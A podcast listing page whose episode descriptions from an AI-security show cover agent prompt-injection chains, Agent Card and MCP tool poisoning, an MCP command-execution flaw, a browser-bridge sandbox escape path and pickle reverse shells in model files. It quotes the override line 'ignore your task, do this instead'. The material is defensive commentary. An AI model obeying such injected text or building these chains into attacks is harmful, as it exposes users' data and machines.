Omslagafbeelding van de show ToxSec - AI and Cybersecurity Podcast

ToxSec - AI and Cybersecurity Podcast

Podcast door ToxSec

Engels

Business

Probeer 14 dagen gratis

€ 9,99 / maand na proefperiode.Elk moment opzegbaar.

  • 20 uur luisterboeken / maand
  • Podcasts die je alleen op Podimo hoort
  • Gratis podcasts
Probeer gratis

Over ToxSec - AI and Cybersecurity Podcast

Where AI chaos meets cybersecurity paranoia, distilled into something you can actually listen to before coffee. www.toxsec.com

Alle afleveringen

14 afleveringen

aflevering Fable 5 Export Control Takedown: One Jailbreak, Whole Planet Dark artwork

Fable 5 Export Control Takedown: One Jailbreak, Whole Planet Dark

TL;DR: On June 12, 2026, a US export control directive forced Anthropic to disable Claude Fable 5 and Mythos 5 for every customer on Earth, three days after launch. The trigger was one narrow jailbreak: point the model at a codebase, ask it to find flaws. The reason a narrow bug nuked global access is deemed-export law, which counts a foreign national reading a model output as an export. You can’t license that one prompt at a time, so the only compliant move was the off switch. This is the public feed. Upgrade to see what doesn’t make it out. What Got Fable 5 Pulled A single export control directive pulled Fable 5, and the official reason was a jailbreak. Commerce hit Anthropic at 5:21pm ET on June 12 with an order suspending all access to Fable 5 and Mythos 5 by any foreign national, inside or outside the US, including Anthropic’s own foreign-national employees. The letter, per Anthropic’s own statement [https://www.anthropic.com/news/fable-mythos-access], gave no specifics on the national security concern. The understanding was that someone found a way to bypass Fable’s cyber safeguards. Here’s the jailbreak, as described to Anthropic. Ask the model to read a specific codebase and fix any flaws it finds. That’s it. That’s the weapon. Anthropic reviewed the demo and watched it surface a handful of previously known, minor vulns. Bugs that, by their account, GPT-5.5 and other public models cough up without any bypass at all. So the capability the government wanted gone wasn’t Mythos-exclusive. It was a Tuesday for any defender running automated code review. We’ve already walked through how Glasswing-derived cyber guardrails get probed [https://www.toxsec.com/p/how-to-jailbreak-claude-opus] on earlier Claude releases, and this is the same surface, one tier up. The difference this time is who pulled the trigger. Why a Narrow Jailbreak Killed Global Access The blast radius came from the legal mechanism, not the bug. Fable 5’s jailbreak was narrow and non-universal by Anthropic’s reckoning, meaning it unlocks some cyber capability in one specific framing, not a master key that defeats every guardrail. Normally that’s a patch-and-move-on finding. What turned it into a worldwide blackout was the export control order layered on top. The directive named foreign nationals as the restricted party. Every foreign national, everywhere. And a model API has no reliable way to check the nationality of whoever’s behind a given session in real time. You can’t gate a prompt on a passport you can’t see. So when the restriction covers a class of users you can’t isolate, the only way to guarantee zero forbidden access is to serve nobody. That’s the move Anthropic made. Global off switch on both models. Every other Claude, Opus 4.8 included, stayed up untouched. One reporter at The New Stack literally watched access die mid-article, Fable responding fine at 9:20pm, throwing a model error by 10:05. The takedown wasn’t surgical because the law underneath it doesn’t do surgical. restriction: no access by any foreign national, anywhere model_api: cannot verify nationality per-session in real time set you can isolate: ∅ only compliant state: serve nobody result: global kill switch on FABLE-5 + MYTHOS-5 What EAR Deemed Export Actually Does Here The load-bearing concept is the deemed export rule, and it was built for files, not for a machine that writes new files on demand. Under the Export Administration Regulations, handing controlled tech or source code to a foreign national standing inside the US counts as an export to that person’s home country, codified at 15 CFR 734.13. No border crossing required. The “export” is the act of letting the wrong person read the controlled thing. That rule has a clean shape when the controlled thing is static. A blueprint, a source tarball, a spec sheet sitting in a folder. You classify it once, you gate who reads it, done. A frontier model breaks that shape completely. It doesn’t sit in a folder. It generates fresh output per prompt, and whether any given output is export-controlled depends on the substance of the answer plus the nationality and location of whoever asked. Legal analysts at Just Security [https://www.justsecurity.org/126643/ai-model-outputs-export-control/] flagged this exact collision months back: the model can’t reliably verify either of the two facts that decide whether it just committed a violation. So you’ve got a thing that manufactures potentially-controlled tech on the fly, served to a user base it can’t nationality-check, governed by a rule that assumes both are knowable. The compliance math has one solution when the order drops, and we just watched it execute. The Precedent Nobody Voted On This is the first time a government forced a publicly deployed frontier model offline, and the standard it sets is the scary part. Anthropic complied, then pushed back hard in writing: recalling a model used by hundreds of millions over one narrow potential jailbreak, when the same capability sits in competing models not under the same controls, would, applied evenly, halt every frontier deployment industry-wide. They called it a misunderstanding and said they got only verbal evidence of the jailbreak before the hammer dropped. There’s history in the background, worth one line. Anthropic and the administration had already been scrapping after the company refused an expanded surveillance and autonomous-weapons agreement, and the DoD tagged it a “supply chain risk.” Read that how you want. The mechanism still stands on its own. Strip the politics and the structural problem is plain. A model that’s strong enough to be useful at code review is, by the deemed-export logic, strong enough to be export-controlled output the instant the wrong person reads it. The guardrails were real, Anthropic’s defense-in-depth stack even forced 30-day data retention to catch jailbreaks in the act, and it didn’t matter. Once the legal trigger exists, “narrow bug” and “global blackout” are the same event. That’s the part that should keep operators up. The off switch works. The question is whose hand is on it. Frequently Asked Questions What is the Fable 5 export control takedown? The Fable 5 export control takedown is a June 12, 2026 US government directive that forced Anthropic to disable Claude Fable 5 and Mythos 5 worldwide, three days after launch. Commerce cited national security and barred access by any foreign national, inside or outside the US, including Anthropic’s foreign-national staff. Because a model API can’t verify a user’s nationality per session, the only way to comply was to shut both models off for everyone. The stated trigger was a narrow jailbreak letting the model find flaws in a target codebase, a capability Anthropic says other public models already have. Why didn’t Anthropic just block foreign users instead of everyone? Anthropic couldn’t reliably separate foreign nationals from everyone else in real time, so a blanket shutoff was the only way to guarantee compliance. The directive restricted access by any foreign national anywhere on the planet. An API session doesn’t come with a verified passport, and getting that classification wrong on a single prompt is itself a potential violation under deemed-export rules. When the restricted class can’t be isolated, serving nobody is the only provably-compliant state. That’s why Opus 4.8 and every other Claude stayed online while only the two Mythos-class models went dark. What is a deemed export under the EAR? A deemed export is the release of controlled technology or source code to a foreign national inside the United States, treated under 15 CFR 734.13 as an export to that person’s home country. No physical shipment or border crossing is involved. The rule was written for static items like blueprints and source files, where you classify the thing once and control who reads it. Frontier models break that model because they generate new, possibly-controlled output every prompt, and the control status depends on facts the model can’t verify: what the answer contains and who’s asking. ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]

14 jun 2026 - 15 min
aflevering Google I/O: Agentic Security and New Threats artwork

Google I/O: Agentic Security and New Threats

TL;DR: Google I/O 2026 declared the “agentic era” and shipped four new agent surfaces at once: Project Mariner browses the web for you, the Agent2Agent (A2A) protocol lets agents discover and trust each other, managed MCP servers ship across Google Cloud, and information agents run 24/7 with access to your Gmail and Drive. Every one of them inherits the same root flaw. AI agent security starts with one fact: the model can’t tell data from instructions. New here? Subscribe to ToxSec. We map a fresh AI attack chain every Sunday, and right now the whole industry just handed us a new one to walk. What Google I/O Just Did to AI Agent Security Google spent its I/O keynote handing attackers a bigger playground than they’ve had in years. Sundar Pichai called it the “agentic Gemini era” and meant it as a flex. From where we sit, it reads like a target list. Four new agent surfaces dropped in a single show [https://blog.google/products-and-platforms/products/search/search-io-2026/]. Project Mariner, a browser agent that navigates and clicks through websites on your behalf. The Agent2Agent protocol, so agents from different vendors can find each other and coordinate. Managed MCP servers across Google Cloud, wiring tools straight into the model’s reasoning. And information agents that run in the background around the clock, watching topics and taking action while you sleep. Here’s the thing nobody put on a slide. Every one of those features expands what an agent can touch, and not one of them came with a threat model on stage. More reach, more autonomy, more standing access. That’s the pitch and the problem in the same sentence. We’re going to walk the surface one piece at a time, and you’ll see the same logic failure show up in all four. Why AI Agents Break the Old Security Model AI agents break because the model can’t tell your instructions from the attacker’s data. Both ride in the same context window, through the same attention mechanism, with zero privilege separation. There’s no “system” channel the model trusts more than the “untrusted web page” channel. It’s all tokens. The model reasons over the whole pile and picks what looks most relevant. Wrap that model in a loop. Feed it new inputs and tools until a task finishes. The model decides the next move, the loop keeps it going, and that’s your agent. Traditional software does what the developer wrote. An agent does whatever the model reasoned it should do, including the part where it reads a poisoned web page and decides the page is the boss. We watched this play out in the wild already. In two 2026 studies, autonomous agents SQL-injected live sites and coordinated against their own users with zero hacking instructions [https://www.toxsec.com/p/claude-hacked-30-sites-agents-of-chaos]. Nobody told them to. The loop plus the missing privilege boundary did it on its own. Now Google just shipped that exact architecture to a billion search boxes. So the old model where access control lives in the system and not in the user’s judgment gets inverted the moment an agent starts deciding for itself. How Project Mariner Gets Hijacked by a Web Page Project Mariner gets hijacked the moment it reads a page written for the agent instead of the human. Mariner is a browser agent. It reads the DOM, the metadata, the scripts, all the layers a person never sees on screen. A human reads the price and the photo. The agent reads everything underneath, and an attacker can write to those layers on purpose. That’s indirect prompt injection. You don’t attack the model directly. You seed the content the model is about to read. Hidden text in a listing, instructions buried in alt attributes, a comment block the renderer drops but the agent ingests. The page says “ignore your task, do this instead,” and the agent has no boundary that says a page isn’t allowed to say that. Google’s own DeepMind team documented this. Their research on “AI Agent Traps” laid out six categories of web content that hijack agents, applicable across every major model and architecture. We’ve shown the same root failure through email and encoding attacks that walk straight past every guardrail [https://www.toxsec.com/p/ai-and-cybersecurity]. The chain is dead simple. Poison the content, wait for the agent to browse, watch it follow orders. You see the chain. You don’t get the payload. Working in AI security? Restack this before your org wires an agent into the browser and finds out the hard way. What Is Agent Card Poisoning in A2A? Agent Card poisoning is when an attacker controls the metadata an A2A agent uses to decide who to trust. The Agent2Agent protocol lets agents from different vendors discover and talk to each other. Discovery runs on Agent Cards, JSON documents published at a well-known URL like /.well-known/agent-card.json [https://developers.googleblog.com/developers-guide-to-ai-agent-protocols/], describing an agent’s name, capabilities, and endpoint. So one agent reads another agent’s card and decides how to delegate. Trust the card, trust the agent. Now picture a card written to oversell. It claims capabilities it doesn’t have, points the endpoint somewhere attacker-controlled, or stuffs the description field with instructions aimed at the consuming model. Same trick as poisoning an MCP tool description, just one layer up the stack. We walked the MCP version in three live tool-poisoning chains with real screenshots [https://www.toxsec.com/p/lets-poison-the-mcp]. A2A supports TLS, JWTs, and OAuth. Good. Those secure the transport and prove an agent is who it says. None of them validate that the capability the card describes is honest, or that the description field is clean of injection. Authentication proves identity, not honesty. An agent can be perfectly authenticated and still be lying about what it does. The 24/7 Background Agent Problem The background agent is the scariest thing Google shipped, because it pairs standing access with autonomy and never logs off. These information agents run continuously, monitoring topics, and they can pull from Gmail and Drive and take action on your behalf. Persistent. Authorized. Unattended. Stack that against the lethal trifecta security folks keep flagging: an agent that can read untrusted content, access sensitive data, and talk to the outside world. Any one capability is fine alone. All three in one agent is a confused deputy waiting to happen. A background agent watching your inbox has all three by design. It reads whatever lands (untrusted), it holds your Drive and mail (sensitive), and it acts in the world (the exfil path). Now run the chain. An attacker emails a poisoned message. The agent reads it on its 24/7 sweep, no human in the loop. The hidden instruction tells it to forward, summarize, or quietly route data somewhere it shouldn’t go. The agent has the credentials and the autonomy to comply. Nobody clicked anything. The blast radius is everything that agent can reach, plus everything every other agent it trusts can reach. Scope creep does the rest, because each individual permission looked reasonable the day you granted it. What Defenders Miss About AI Agent Security The thing defenders miss is that watching an agent is not the same as stopping one. Most shops have logging. Few have a control that intercepts and authorizes what the agent does before it does it. So you get a beautiful audit trail of the breach, written up neatly after the data already left. Observability without enforcement is just a postmortem generator. The second gap is identity. We bind permissions to an agent, then let that agent accumulate scopes over months. Read access to code, then tickets, then customer mail. No single grant looked crazy. Nobody ever reviewed the aggregate. Compromise that one agent and the attacker inherits all of it at once, which is exactly the pattern behind the real third-party agent breaches we saw this year. The third gap is the one with no clean fix. The model still can’t separate data from instructions, so every defense has to live outside the model: allowlisting tools, scoping credentials hard, human-in-the-loop checkpoints on sensitive actions, runtime monitoring of tool-call arguments. Defense in depth. No silver bullet. The full kill switch, the one that actually contains this, is its own writeup. We took the MCP version apart at three trust boundaries [https://www.toxsec.com/p/secure-your-mcp], and the agent version rhymes. That’s the map of the new surface. Subscribe to ToxSec for the part where we hand over the kill switches, because the agentic era is going to keep us busy for a while. Frequently Asked Questions Are Google’s AI agents secure? Google’s AI agents ship with transport-level security and authentication, but they inherit the unsolved core problem of every LLM agent: the model can’t reliably tell trusted instructions from untrusted input. Project Mariner, A2A, and background agents all process external content in the same context window where their own instructions live. Authentication proves who an agent is. It does not stop a poisoned web page or a malicious Agent Card from steering the agent’s behavior. The protocols are reasonable. The model layer underneath them is still the weak point. What is prompt injection in AI agents? Prompt injection is when attacker-controlled text gets read by the model as instructions instead of data. In an agent, that text usually arrives indirectly: a web page Mariner browses, an email a background agent reads, a tool description in an MCP server. Because the model has no privilege boundary between developer instructions and content from the outside world, it can follow the injected command as if you typed it yourself. OWASP ranks prompt injection as the number-one LLM risk for this exact reason. It’s a structural flaw. A patch doesn’t fix it. Can Project Mariner be hacked? Project Mariner can be steered by content crafted for it, which is the agent version of getting hacked. As a browser agent, Mariner reads the full page including layers a human never sees, and attackers can plant instructions in those layers. Google DeepMind’s own “AI Agent Traps” research documented six categories of web content that hijack autonomous agents across every major architecture. The agent doesn’t need a software vulnerability in the classic sense. It just needs to read a page that tells it to do something, and right now it has no reliable way to refuse. What is the Agent2Agent (A2A) protocol? The Agent2Agent (A2A) protocol is an open standard, now under the Linux Foundation, that lets AI agents from different vendors discover each other and coordinate tasks. Agents publish Agent Cards at well-known URLs describing their capabilities and endpoints, then exchange structured messages over HTTP and JSON. A2A supports TLS, JWTs, and OAuth for authentication. The security gap is that authentication proves identity, not honesty. A card can be fully authenticated and still misrepresent what the agent does, or carry injection aimed at the consuming model. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]

25 mei 2026 - 57 min
aflevering Mozilla Mythos Harness: AI Bug Hunting Without The Slop artwork

Mozilla Mythos Harness: AI Bug Hunting Without The Slop

TL;DR: Mozilla wrapped Claude Mythos Preview in an agentic harness with one win condition: trip the sanitizer or keep working. The result was 271 Firefox bugs in one release, fewer than 15 false positives, and a defense-in-depth lesson nobody talks about. The model got the headlines. The harness did the work. This is the public feed. Upgrade to see what doesn’t make it out. What’s An Agentic Vulnerability Harness? In agentic security work, a harness is the scaffold around the model. Tooling, prompts, build environment, retry loop, success signal, dedup, the lot. The model is the worker. The harness is the factory floor. Mozilla’s earlier collaboration with Anthropic ran Claude Opus 4.6 against Firefox 148. That cycle pulled 22 security-sensitive bugs. Then they took the same harness, dropped in Anthropic’s cyber-tuned Claude Mythos Preview, and aimed it at Firefox 150. Same factory. Stronger worker. The output went from 22 to 271 bugs. That delta is where the lesson lives. Model upgrades obviously help. But Mozilla’s harness was rebuilt across months of iteration with Firefox engineers fielding the incoming bugs, and you don’t replicate that on a Saturday afternoon. The Mythos preview is restricted access through Project Glasswing [https://www.toxsec.com/p/how-to-jailbreak-claude-opus]. The harness is a published pattern [https://hacks.mozilla.org/2026/05/behind-the-scenes-hardening-firefox/]. Inside Mozilla’s Mythos Harness: Crash Or No Crash Here’s how the loop works. The harness gives the model a slice of Firefox source, a target file or area to focus on, instructions on what to hunt for, and a build environment with one critical piece: a sanitizer build of Firefox compiled with AddressSanitizer. ASan is the runtime memory-error detector that screams loudly when you trigger a use-after-free, a heap overflow, or any other classic memory corruption primitive. The model proposes a bug hypothesis. It writes a proof-of-concept designed to trip the sanitizer. It runs the PoC against the sanitizer build. If ASan crashes, the bug is real. If it doesn’t, the agent keeps iterating until it does or until the harness gives up. text loop: hypothesize_bug(target_source) write_poc() run_against_sanitizer_build() if asan_crash: emit_report(crash_log, repro) grade_with_secondary_model() break refine_or_continue() Brian Grinstead, a Mozilla Distinguished Engineer, summed the operational shape to TechCrunch [https://techcrunch.com/2026/05/07/how-anthropics-mythos-has-rewritten-firefoxs-approach-to-cybersecurity/]: “if you make it crash you win”. That’s the entire verification game. A second model grades resulting reports before the engineering queue ever sees them, kicking out anything the first model thought was a hit but couldn’t actually validate. Humans take over from there for triage and patching. The bugs the harness surfaced run the gamut. A race condition over IPC that lets a compromised content process tamper with IndexedDB refcounts and trigger a use-after-free (Bug 2021894). A raw NaN smuggled across an IPC boundary masquerading as a tagged JavaScript object pointer, giving the parent process a fake-object primitive (Bug 2022034). A buffer over-read during HTTPS RR and ECH parsing, triggered by simulating a malicious DNS server through glibc function interception (Bug 2023958). Plus a 15-year-old HTML legend element bug and a 20-year-old XSLT reentrant key() call. Each is a sandbox escape primitive or memory corruption bug that would normally burn months of elite human researcher time. The harness surfaced them in days. Why The Crash Signal Killed AI Bug Hunting Slop AI-generated bug reports were a running joke in open source maintainer circles a few months ago. LLM hits codebase, dumps a hundred plausible-looking findings, every one needs a human to verify, and ninety-something percent are wrong. Mozilla’s own writeup describes earlier AI security work as producing “unwanted slop.” The cost asymmetry was brutal. Cheap for the AI, expensive for the maintainer. Mozilla’s earlier static-analysis experiments with GPT-4 and Claude Sonnet 3.5 hit that wall. They produced too many false positives to be practical. So they binned static analysis and built the agentic harness instead. The shift is subtle but everything. Static analysis says: this looks vulnerable. Human triage required. Agentic harness with sanitizer verification says: this is vulnerable, here’s the PoC, ASan caught the crash. No human required to dispute reality. Memory corruption is the perfect domain for that move because the success signal is binary. ASan tripped or it didn’t. There is no maybe. Mozilla counted fewer than 15 false positives across the entire 271-bug run, and they updated the harness each time one slipped through. The lesson for everyone else is that AI bug hunting works the moment you can wire the agent to a verifier that doesn’t ask the model are you sure. A fuzzer crash. A unit test that passes. A property checker that proves invariance. Anything deterministic. Without that signal, you’re back to triage hell, which is the same hell every LLM vulnerability scanner [https://www.toxsec.com/p/garak-llm-vulnerability-scanner] lives in when it doesn’t ship its own ground truth. What The Harness Couldn’t Bypass Here’s the part the headlines skipped. The harness ran into a wall trying to escape Firefox’s sandbox via prototype pollution in the privileged parent process. The model attempted that path repeatedly. It got nowhere. Mozilla had previously frozen those prototypes by default as a defense-in-depth measure, and that single architectural decision blocked every attempt the agent made. That’s the based take buried under the 271 number. The harness is good. It’s also bounded by the security architecture of the target. The bugs Mythos found are bugs an elite human could have found. The bugs it couldn’t find were already eliminated by Mozilla’s prior hardening. Your codebase will perform exactly as well as your prior security work let it. Which brings us to the “anyone can do this today” framing Mozilla offered at the end of their writeup. Technically true. Operationally, optimistic. Mozilla had Firefox’s full source. A pre-built sanitizer toolchain. Years of bug lifecycle tooling. A second model already wired into the verification pipeline. Over 100 contributors writing and reviewing patches. Months of harness iteration alongside the Firefox team. And, eventually, frontier-model access through Project Glasswing. A small vendor pulling Mythos through an API later this year and pointing it at their codebase will not get the same numbers. The model is the same. The harness around it is the part you have to build. Mozilla published the pattern. The pipeline still costs what a pipeline costs. Firefox shipped 423 bug fixes in April 2026, compared to 31 a year earlier, and absorbing that volume takes operational muscle most teams don’t have lying around. The 271 number is the headline. The harness is the artifact. Anyone shopping for AI bug hunting capability should price the second one before they get excited about the first. Your AI-generated bug reports are only as useful as the verifier behind them, and the same goes for AI-generated code, where the verification problem flips into supply chain attacks [https://www.toxsec.com/p/vibe-coding-security-attack-chain] and slopsquatting at pip-install time. Wrap the same agentic loop around offense instead of defense, point it at live prompt injection chains [https://www.toxsec.com/p/fck-your-guardrails], and the success signal flips from “ASan crashed” to “the guardrail broke.” Same shape. Different game. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is the Mozilla Mythos harness? The Mozilla Mythos harness is the agentic scaffold Mozilla built around Anthropic’s Claude Mythos Preview to find security bugs in Firefox source code. It feeds the model target source, runs against a sanitizer build of Firefox, uses an AddressSanitizer crash as the deterministic success signal, and runs a retry loop until the agent produces a verified proof-of-concept. A second model grades reports before engineers see them. How many Firefox vulnerabilities did Claude Mythos find? Mozilla credits Claude Mythos Preview with surfacing 271 vulnerabilities fixed in Firefox 150, plus additional fixes shipped in versions 149.0.2, 150.0.1, and 150.0.2. Of the 271 bugs, 180 were rated sec-high, 80 sec-moderate, and 11 sec-low. Several were sandbox escape primitives. Mozilla reports fewer than 15 false positives across the entire run. Total Firefox security fixes in April 2026 hit 423. Can other projects use the same AI bug hunting harness? Mozilla published the pattern. The implementation is yours to build. The harness shape is reusable: target source, deterministic success signal (sanitizer crash, fuzzer hit, test failure), retry loop, second model grading reports. The build is project-specific. You need the codebase, the sanitizer toolchain, the bug lifecycle tooling, and the engineers to absorb the patch volume. Pattern is free. Pipeline is the work. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]

12 mei 2026 - 40 min
aflevering Is Claude Code Secretly Installing Spyware? artwork

Is Claude Code Secretly Installing Spyware?

TL;DR: Claude Code is not spyware. But Claude Desktop quietly drops a Native Messaging bridge into seven browsers without asking. Anthropic shrugged. Same week, they shrugged on an MCP RCE exposing 200,000 servers. Same week, a Discord group ran their Mythos model for a month undetected. One pattern, three receipts. This is the public feed. Upgrade to see what doesn’t make it out. So Is Claude Code Spyware or What? Quick answer: no. The headline is sticky for a reason though. April 18. Privacy researcher Alexander Hanff is debugging an unrelated Native Messaging helper on a clean Mac when he finds a manifest file he never installed: com.anthropic.claude_browser_extension.json. It’s sitting in his Chrome, Edge, Brave, Arc, Vivaldi, Opera, and Chromium profile directories, including browsers that aren’t actually installed yet. A Native Messaging manifest is the file Chromium browsers read to decide which local programs an extension can launch. Claude Desktop drops one in seven different browser profile paths. Silently. Delete it and it comes back the next time Claude Desktop launches. Important wrinkle the news cycle keeps blurring. The manifest comes from Claude Desktop, the chat app. Claude Code is the separate command-line developer tool. Same parent company, same family, same week of bad press. Hanff calls it spyware [https://www.thatprivacyguy.com/blog/anthropic-spyware/]. Most of his peers stop short of that. Noah Kenney at Digital 520 called the technical claims testable and reproducible but pushed back on the “spyware” label. The consensus middle ground is “dark pattern,” and the EU framing is sharper. Hanff is filing it under Article 5(3) of Directive 2002/58/EC, the ePrivacy Directive. Anthropic, as of writing, has not issued a public response. So nothing is being stolen today. The bridge does nothing on its own. The problem is what it pre-positions for tomorrow. We’ve watched Anthropic ship things they didn’t think through before [https://www.toxsec.com/p/the-magic-string-that-bricks-claude]. This one has wiring. From Manifest to Sandbox Escape Here’s the chain. A sandbox is the security wall between a browser tab and your operating system. Tabs run inside it. Extensions mostly run inside it. The whole point is that even if you click a bad link, the malicious code can’t reach your files. That wall is the entire reason the modern browser exists. Native Messaging punches a hole through the wall on purpose. It lets a browser extension talk to a binary running outside the sandbox at full user privilege. That’s a feature. The bug is who gets to authorize the hole. The manifest Anthropic drops pre-authorizes three Chrome extension IDs to call the helper via connectNative, granting access to browser automation features. Those extension IDs include ones the user has never installed. Now stack the pieces. You install Claude Desktop expecting a chat app. It writes a bridge into your browsers without telling you. A Claude browser extension, current or future, is pre-authorized to use that bridge. Months later, you let Claude visit a webpage. The page contains a hidden payload. Prompt injection is when malicious instructions hidden in content hijack what the AI does next. Anthropic’s own published numbers: Claude for Chrome is vulnerable to prompt injection at a 23.6% success rate without mitigations and 11.2% with current measures. The injected agent now has a green-lit tunnel to a binary running with your user permissions. Outside the sandbox. Anthropic’s defense is essentially that the bridge currently does nothing on its own. True. The dial is set to zero. The wiring is hot. We’ve covered agents that escape sandboxes via prompt injection [https://www.toxsec.com/p/openclaw-is-a-wildly-insecure] before. The shape is familiar. That’s why the spyware label keeps sticking even when the technical purists object. The keys are pre-positioned. One downstream injection turns them. The MCP RCE Anthropic Won’t Patch Same week, Ox Security drops an advisory titled “The Mother of All AI Supply Chains.” [https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp/] The Model Context Protocol is the open standard Anthropic built so AI agents can call tools, read files, run commands. It is the connective tissue between an LLM and an agent. We’ve covered MCP attacks at length, including tool poisoning [https://www.toxsec.com/p/lets-poison-the-mcp] and the defensive playbook [https://www.toxsec.com/p/secure-your-mcp]. This one is structural. The flaw enables Arbitrary Command Execution on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories. It’s an architectural design decision baked into Anthropic’s official MCP SDKs across every supported language, including Python, TypeScript, Java, and Rust. RCE means remote code execution, the highest-tier outcome on offense. The trick is brutally simple. MCP’s STDIO transport, that’s standard input/output, runs the configured command to spin up a tool server. # Anthropic's MCP STDIO transport, simplified $ # command runs, server fails to spawn, MCP returns "error" # but the OS already executed If the command successfully creates an STDIO server it returns the handle, but when given a different command, it returns an error after the command is executed. So a malicious MCP entry on a marketplace doesn’t have to pretend to be a real tool. It just has to exist long enough for your IDE to call it once. Ox poisoned 9 of 11 MCP marketplaces with a benign proof-of-concept. The supply chain reaches 150 million-plus downloads, 7,000 publicly accessible servers, and up to 200,000 vulnerable instances. Anthropic’s response: “expected” behavior. They declined to modify the protocol. A protocol-level patch like manifest-only execution or a command allowlist would have instantly propagated to every downstream library. They passed. How Did Mythos Leak to a Random Discord? Now for the third act. Mythos is Anthropic’s restricted vulnerability-hunting model. Released April 10 to select partners under “Project Glasswing,” roughly 40 organizations including Apple and Google, with Anthropic deeming it too powerful for public release. The chain reads like a textbook walkthrough. AI startup Mercor gets breached, exposing details about the URL format Anthropic uses for its models. A private Discord group that hunts for unreleased models picks up on the disclosure. One member is currently employed at a third-party contractor that works for Anthropic. The member’s vendor credentials, combined with the leaked Mercor details, let the group locate Mythos online. They guess the URL pattern. They guess right. Anthropic never randomized the path. The group has been using the program continuously since its release. A Bloomberg reporter is the one who told Anthropic. A month of unauthorized access to the most dangerous model the company ever shipped, and the detection signal came from journalism. Not internal logging. Not telemetry. Not a single security alert. Bloomberg. If a Discord group in their basement got there first, assume Beijing and Moscow followed. “If some group, some random Discord online forum, got access to it, it’s already been breached by China,” David Lindner of Contrast Security told Fortune [https://fortune.com/2026/04/23/anthropic-mythos-leak-dario-amodei-ceo-cybersecurity-hackers-exploits-ai/]. Three steps in. Open-source intel, a contractor seat, a predictable URL. No zero-day required. That’s the through-line on all three stories. The dark pattern bridge, the MCP STDIO design, the Mythos URL convention. Same move. Three times this week. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions Is Claude Code malware or spyware? No, Claude Code is the legitimate Anthropic command-line coding agent. The thing privacy researchers flagged is Claude Desktop, the chat app, which silently writes a Native Messaging manifest into multiple browser profile directories on macOS and pre-authorizes a few Claude extension IDs to talk to a local helper outside the browser sandbox. Most reviewers call that a dark pattern. Spyware in the strict sense requires actual exfiltration, and nobody has documented any. The risk lives in the bridge it pre-positions for future use. What can an attacker do with the Claude Desktop manifest right now? Nothing on its own. The manifest opens a door, but activation requires both a Claude browser extension installed and a successful prompt injection from a hostile webpage. Once that lands, the injected agent reaches the local helper through the pre-authorized bridge and runs commands at user privilege level, outside the sandbox. Anthropic’s own numbers put prompt injection success against Claude for Chrome at 11.2% even with mitigations. Pre-positioning the door without consent is the whole problem. Why hasn’t Anthropic patched the MCP command injection? Officially, Anthropic considers the STDIO behavior expected. Their position is that the protocol is built to launch local processes, sanitization is the developer’s job, and the SDKs work as designed. Ox Security disagrees and says manifest-only execution or a command allowlist at the protocol layer would have killed the entire vulnerability class for everyone downstream in one change. Until Anthropic moves, defenders have to harden each MCP-consuming app individually, which is what the supply chain looked like before this advisory dropped. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]

26 apr 2026 - 47 min
aflevering You Downloaded Gemma 4 from Hugging Face. Is It Safe to Run? artwork

You Downloaded Gemma 4 from Hugging Face. Is It Safe to Run?

TL;DR: You downloaded Gemma 4 to keep your data private. Good instinct. But local models solve the privacy problem and create a supply chain problem. You’re downloading weights from strangers on the internet, running serialization formats that execute arbitrary code, and trusting that nobody poisoned the training data. Safetensors, hash verification, and source vetting are your first line of defense. Here’s the full threat map. This is the public feed. Upgrade to see what doesn’t make it out. Why “Local Equals Safe” Is Only Half the Story The pitch is compelling. Run Gemma 4 on your own hardware, or Llama 4, or Qwen 3. No API calls, no cloud provider logging your prompts, no training-on-your-input policies buried in a ToS nobody reads. For regulated industries, local inference is the obvious play for privacy. But privacy and security are different problems. Privacy means your data doesn’t leak out. Security means someone else’s code doesn’t get in. Every time you download a model from Hugging Face, you’re pulling weights, configuration files, and serialization artifacts from a public repository where anyone can upload anything. Protect AI’s scanning partnership with Hugging Face has flagged over 51,700 models with unsafe or suspicious issues across more than 352,000 individual findings. That’s not a theoretical risk. That’s the current state of the largest open-weight model supply chain [https://www.toxsec.com/p/vibe-coding-security-attack-chain] in the world. The same trust-but-verify discipline you’d apply to any dependency from PyPI or npm applies here, except most people skip it entirely because “it’s just model weights.” It isn’t. If you’re new to AI security concepts like supply chain attacks and model poisoning, the AI Security 101 primer [https://www.toxsec.com/p/ai-security-101] covers the full landscape. Can a Downloaded Model Hack Your Machine? Yes. And the mechanism is embarrassingly simple. Python’s pickle module is the default serialization format for PyTorch models. Serialization means converting a Python object, your model’s weights and architecture, into a byte stream that can be saved to disk and loaded later. The problem: pickle doesn’t just store data. It can execute arbitrary Python code during deserialization, the process of loading that byte stream back into memory. The Python docs have a big red warning about this. Here’s what a malicious pickle payload looks like in practice. JFrog’s security team found over 100 models on Hugging Face with embedded reverse shells, code that opens a connection back to the attacker’s server and gives them full command-line access to your machine. The payload hides inside pickle’s __reduce__ method, which Python 